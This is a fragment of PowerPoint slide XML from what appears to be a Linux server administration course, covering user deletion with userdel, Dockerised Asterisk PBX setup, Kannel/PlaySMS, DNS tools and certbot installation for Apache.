                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="440"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="3420">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>userdel -r -f  &lt;userName&gt;</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3420">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="1828800" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="440"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="3420">
                <a:solidFill>
                  <a:srgbClr val="A32EFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>or</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3420">
              <a:solidFill>
                <a:srgbClr val="A32EFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="440"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="3420">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>userdel -f -r  &lt;userName&gt;</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3420">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="1828800" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="440"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="3420">
                <a:solidFill>
                  <a:srgbClr val="A32EFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>or</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3420">
              <a:solidFill>
                <a:srgbClr val="A32EFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="440"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="3420">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>userdel -fr  &lt;userName&gt;</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3420">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide6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0" name="Shape 4150"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4151" name="Google Shape;4151;p674"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="344100" y="1654675"/>
            <a:ext cx="8799900" cy="72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u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>Asterisk IP PBX (Free) Call Center Docker installation on the Server Issabel</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3100">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide6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5" name="Shape 4155"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4156" name="Google Shape;4156;p67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Asterisk Resources</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3120">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4157" name="Google Shape;4157;p6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X-Ten SoftPhone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4"/>
              </a:rPr>
              <a:t>Asterisk.conf sample file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u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>https://www.atlantic.net/vps-hosting/how-to-install-asterisk-and-freepbx-on-ubuntu/</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>https://sangomakb.atlassian.net/wiki/spaces/FP/pages/230326391/FreePBX+17+Installation</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide6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1" name="Shape 4161"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4162" name="Google Shape;4162;p67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Asterisk Resources</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3120">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4163" name="Google Shape;4163;p6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700">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>docker run -u root --privileged -p 81:80 -p 443:443 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2700">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-p 5060:5060/tcp </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2700">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-p 5060:5060/udp -p 5061:5061 -p 10000-10099:10000-10099/udp  -it -d debian:latest</a:t>
            </a:r>
            <a:endParaRPr sz="2700">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide6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7" name="Shape 4167"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4168" name="Google Shape;4168;p677"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="305950" y="805500"/>
            <a:ext cx="8385300" cy="71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600">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Setup Kannel With PlaySMS</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="4600">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4169" name="Google Shape;4169;p677"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6822699" y="170275"/>
            <a:ext cx="2228449" cy="635225"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4170" name="Google Shape;4170;p677"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="9170" l="0" r="0" t="3902"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="181525" y="1524900"/>
            <a:ext cx="3546075" cy="3082400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4171" name="Google Shape;4171;p677"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="23623" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4076850" y="3558350"/>
            <a:ext cx="4252200" cy="1228075"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4172" name="Google Shape;4172;p677"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="-4822" r="76505" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4921750" y="1757350"/>
            <a:ext cx="2228448" cy="1736000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide6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6" name="Shape 4176"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4177" name="Google Shape;4177;p678"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2628475" y="1783694"/>
            <a:ext cx="4436726" cy="2619006"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4178" name="Google Shape;4178;p678"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="836625" y="859275"/>
            <a:ext cx="2803800" cy="75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400">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Setup</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="5900">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr b="1" sz="5900">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4179" name="Google Shape;4179;p678"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6822699" y="170275"/>
            <a:ext cx="2228449" cy="635225"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4180" name="Google Shape;4180;p678"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="27772" l="0" r="0" t="30312"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3918033" y="1060500"/>
            <a:ext cx="3061557" cy="723194"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide6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4" name="Shape 4184"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4185" name="Google Shape;4185;p679"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="1058550"/>
            <a:ext cx="8329200" cy="11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rPr>
              <a:t>AWS - How to prevent from </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="3000">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Brute Force</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="3000">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Attack </a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3000">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4186" name="Google Shape;4186;p679"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7217375" y="212400"/>
            <a:ext cx="1722375" cy="490975"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4187" name="Google Shape;4187;p679"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="20838" l="1758" r="0" t="10522"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="898074" y="2287186"/>
            <a:ext cx="7739052" cy="2104415"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide6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1" name="Shape 4191"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4192" name="Google Shape;4192;p680"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10325" y="2075"/>
            <a:ext cx="9144000" cy="5143500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="015D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93" name="Google Shape;4193;p680"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="7715" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2721188" y="171775"/>
            <a:ext cx="5205675" cy="4804100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4194" name="Google Shape;4194;p680"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="191025" y="500725"/>
            <a:ext cx="2743800" cy="68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5400">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Firewall</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="5400">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4195" name="Google Shape;4195;p680"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7231050" y="170275"/>
            <a:ext cx="1820099" cy="518825"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="4196" name="Google Shape;4196;p680"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="1479350" y="1181125"/>
            <a:ext cx="3674400" cy="2061300"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd fmla="val 93994" name="adj1"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="76200">
            <a:solidFill>
              <a:srgbClr val="CC0000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="stealth"/>
            <a:tailEnd len="med" w="med" type="none"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide6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0" name="Shape 4200"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4201" name="Google Shape;4201;p681"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1331550"/>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FLUSH DNS Cache</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4202" name="Google Shape;4202;p681"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1690425"/>
            <a:ext cx="8520600" cy="13545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500" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://developers.google.com/speed/public-dns/cache</a:t>
            </a:r>
            <a:endParaRPr sz="2800"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide6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6" name="Shape 4206"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4207" name="Google Shape;4207;p682"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="89810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420">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DNS Tools</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3420">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4208" name="Google Shape;4208;p682"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2317125" y="1867350"/>
            <a:ext cx="5371200" cy="155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u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://intodns.com/</a:t>
            </a:r>
            <a:endParaRPr sz="3600"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3600" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://mxtoolbox.com/</a:t>
            </a:r>
            <a:endParaRPr sz="3600"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide6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2" name="Shape 4212"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4213" name="Google Shape;4213;p683"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="845100" y="790375"/>
            <a:ext cx="7827600" cy="268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850">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sudo apt update</a:t>
            </a:r>
            <a:endParaRPr sz="2850">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2850">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sudo apt install certbot python3-certbot-apache</a:t>
            </a:r>
            <a:endParaRPr sz="2850">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2850">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sudo a2enmod headers</a:t>
            </a:r>
            <a:endParaRPr sz="2850">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2850">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sudo a2enmod ssl</a:t>
            </a:r>
            <a:endParaRPr sz="2850">
